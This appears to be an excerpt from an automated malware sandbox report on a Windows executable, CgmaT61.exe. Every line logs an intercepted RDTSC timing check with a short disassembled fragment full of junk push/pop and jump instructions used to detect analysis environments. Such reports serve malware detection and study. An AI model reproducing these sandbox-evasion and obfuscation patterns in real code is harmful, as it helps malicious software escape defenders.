Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C628D3 second address: C628D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C628D9 second address: C628DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C628DD second address: C628F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FD32CC50BA0h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5C8CE second address: C5C8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5DA60 second address: C5DA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C63A06 second address: C63A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5FA5F second address: C5FA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C64A04 second address: C64A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD32D43E286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C64A0E second address: C64A7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD32CC50B98h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx ebx, di 0x00000028 xor dword ptr [ebp+122D296Ch], edx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FD32CC50B98h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D2BEAh] 0x00000052 push eax 0x00000053 jp 00007FD32CC50BB0h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C64A7E second address: C64A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65A07 second address: C65A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65A0C second address: C65A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD32D43E286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65A16 second address: C65A31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD32CC50BA0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C66A89 second address: C66A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C66A8D second address: C66A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C62A6C second address: C62A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65B7C second address: C65B82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65B82 second address: C65B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C66BD0 second address: C66BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65B88 second address: C65B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65B8C second address: C65B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C65B9B second address: C65BA5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD32D43E28Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C61B45 second address: C61BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA8h 0x00000009 popad 0x0000000a pop edi 0x0000000b nop 0x0000000c jmp 00007FD32CC50BA5h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 clc 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FD32CC50B98h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a call 00007FD32CC50BA8h 0x0000003f call 00007FD32CC50BA5h 0x00000044 cld 0x00000045 pop edi 0x00000046 pop ebx 0x00000047 mov dword ptr [ebp+12451AB1h], ebx 0x0000004d mov eax, dword ptr [ebp+122D0A75h] 0x00000053 mov edi, dword ptr [ebp+122D250Ah] 0x00000059 push FFFFFFFFh 0x0000005b push eax 0x0000005c jc 00007FD32CC50BAEh 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 pop ecx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C68CFD second address: C68D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C68D01 second address: C68D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C68D07 second address: C68D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C71030 second address: C71034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7072D second address: C70731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C70731 second address: C70757 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FD32CC50BA4h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C70757 second address: C7075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C708F3 second address: C7090A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD32CC50B96h 0x00000008 jmp 00007FD32CC50B9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7090A second address: C70924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FD32D43E286h 0x0000000b jp 00007FD32D43E286h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FD32D43E286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C70A99 second address: C70A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C70A9E second address: C70AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD32D43E286h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C77485 second address: C7748F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7748F second address: C774B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E28Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD32D43E28Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C774B1 second address: C774B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C774B6 second address: C774E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push edi 0x0000000f jne 00007FD32D43E286h 0x00000015 pop edi 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD32D43E296h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C77783 second address: C77787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C35C second address: C7C368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD32D43E286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C5C9 second address: C7C5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C5D1 second address: C7C5DB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD32D43E286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C6F3 second address: C7C70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD32CC50B96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FD32CC50B96h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C70A second address: C7C70E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7C88D second address: C7C897 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD32CC50B96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C7CA1A second address: C7CA75 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jno 00007FD32D43E286h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007FD32D43E293h 0x0000001c jmp 00007FD32D43E28Bh 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 jmp 00007FD32D43E295h 0x00000028 jne 00007FD32D43E295h 0x0000002e jmp 00007FD32D43E28Fh 0x00000033 jl 00007FD32D43E28Ch 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C825B7 second address: C825BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8151D second address: C81527 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81527 second address: C8153C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD32CC50B96h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8153C second address: C81554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32D43E28Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81554 second address: C8156F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8156F second address: C81573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81573 second address: C8159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD32CC50B96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD32CC50BA9h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8184D second address: C81878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD32D43E28Ah 0x0000000b push ecx 0x0000000c jmp 00007FD32D43E292h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81878 second address: C81895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81895 second address: C8189B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C819FF second address: C81A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FD32CC50BA3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81A1F second address: C81A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FD32D43E286h 0x0000000d jng 00007FD32D43E286h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81A32 second address: C81A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81A4E second address: C81A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81EB5 second address: C81ED1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD32CC50B98h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b jmp 00007FD32CC50B9Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C81FFD second address: C82009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C82318 second address: C8232C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FD32CC50B96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C88F09 second address: C88F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C88F0F second address: C88F15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C88F15 second address: C88F4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD32D43E29Fh 0x00000008 jmp 00007FD32D43E299h 0x0000000d jmp 00007FD32D43E291h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C88F4E second address: C88F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FD32CC50B98h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E527 second address: C8E52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E52B second address: C8E531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E531 second address: C8E557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD32D43E292h 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FD32D43E286h 0x00000014 jne 00007FD32D43E286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E6F0 second address: C8E6FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E6FA second address: C8E710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32D43E292h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E710 second address: C8E714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E876 second address: C8E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E882 second address: C8E88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E88B second address: C8E8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007FD32D43E28Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD32D43E286h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8E8A5 second address: C8E8A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8ECAA second address: C8ECB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8ECB0 second address: C8ECC5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8ECC5 second address: C8ECE3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD32D43E291h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE1A second address: C8EE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FD32CC50B96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE28 second address: C8EE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD32D43E286h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE33 second address: C8EE3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE3B second address: C8EE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE3F second address: C8EE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8EE60 second address: C8EE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8F2B3 second address: C8F2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C8F2B8 second address: C8F2CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD32D43E288h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FD32D43E286h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93E51 second address: C93E57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93E57 second address: C93E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32D43E290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93E6B second address: C93E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA6h 0x00000007 je 00007FD32CC50B96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
